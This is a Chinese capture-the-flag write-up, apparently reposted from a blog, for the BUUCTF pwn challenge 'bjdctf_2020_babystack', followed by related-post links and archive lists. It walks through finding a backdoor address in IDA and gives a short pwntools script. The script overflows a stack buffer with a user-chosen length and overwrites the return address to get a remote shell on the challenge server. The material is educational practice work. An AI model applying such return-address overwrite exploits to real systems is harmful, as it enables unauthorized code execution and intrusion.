[BUUCTF]PWN——bjdctf_2020_babystack

其他 2021-04-02 21:03:43 阅读次数: 0

例行检查，64位，开启NX保护
在这里插入图片描述
运行一下，

用IDA打开，检索字符串，看到了后门

跟进查看。

在这里插入图片描述
找到了地址，shelladdr=0x4006EA
查看主函数

接收函数长度由我们自己决定，由此可以造成溢出。

from pwn import*

r=remote('node3.buuoj.cn',25232)
shelladdr=0x4006EA

r.sendline('100')
payload='a'*(0x10+8)+p64(shelladdr)

r.sendline(payload)
r.interactive()

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/BangSen1/article/details/115309147

BUUCTF(pwn)bjdctf_2020_babystack

[BUUCTF]PWN——bjdctf_2020_babystack

bjdctf_2020_babystack

[BUUCTF]PWN——bjdctf_2020_YDSneedGrirlfriend（UAF）

[BUUCTF]PWN——bjdctf_2020_babyrop

bjdctf_2020_babystack2

BUUCTF Crypto [BJDCTF2020]easyrsa wp

BUUCTF Crypto [BJDCTF2020]RSA wp

BUUCTF--[BJDCTF2020]easy

BUUCTF：[BJDCTF2020]鸡你太美

BUUCTF：[BJDCTF2020]认真你就输了

BUUCTF：[BJDCTF2020]纳尼

BUUCTF：[BJDCTF2020]just_a_rar

BUUCTF：[BJDCTF2020]藏藏藏

[BUUCTF]REVERSE------[BJDCTF2020]JustRE

[BUUCTF]PWN——wustctf2020_number_game

[BUUCTF]PWN——wustctf2020_getshell

BUUCTF Crypto [BJDCTF2020]编码与调制 wp

BUUCTF Crypto [BJDCTF2020]rsa_output wp

BUUCTF Crypto [BJDCTF2020]这是base?? wp

BUUCTF：[BJDCTF2020]一叶障目

BUUCTF：[BJDCTF2020]你猜我是个啥

BUUCTF：[BJDCTF2020]EasySearch ----- ssi注入漏洞

BUUCTF-PWN gyctf_2020_force（house of force）

[BUUCTF]PWN——wustctf2020_name_your_cat（数组越界）

【BUUCTF - PWN】PWN5

【BUUCTF - PWN】babyrop

【BUUCTF - PWN】rip

buuctf-pwn babyrop

BUUCTF(Pwn) rip

今日推荐

周排行

Android图片与下拉框

java常用的设计模式之单例模式

zabbix自动化监控之自动注册

杨老师课堂之Excel VBA 程序开发第八讲使用工作表函数

Android 去掉底部虚拟导航栏

Android Studio 3.2 Beta 4 发布，功能改进和修复

Linux-3.5_总线驱动设备

Qt QTableView QStandardItemModel用法

session处理

分享几个实用的方法

每日归档

2025-02-06(0)

2025-02-05(0)

2025-02-04(0)

2025-02-03(0)

2025-02-02(0)

2025-02-01(0)

2025-01-31(0)

2025-01-30(0)

2025-01-29(0)

2025-01-28(0)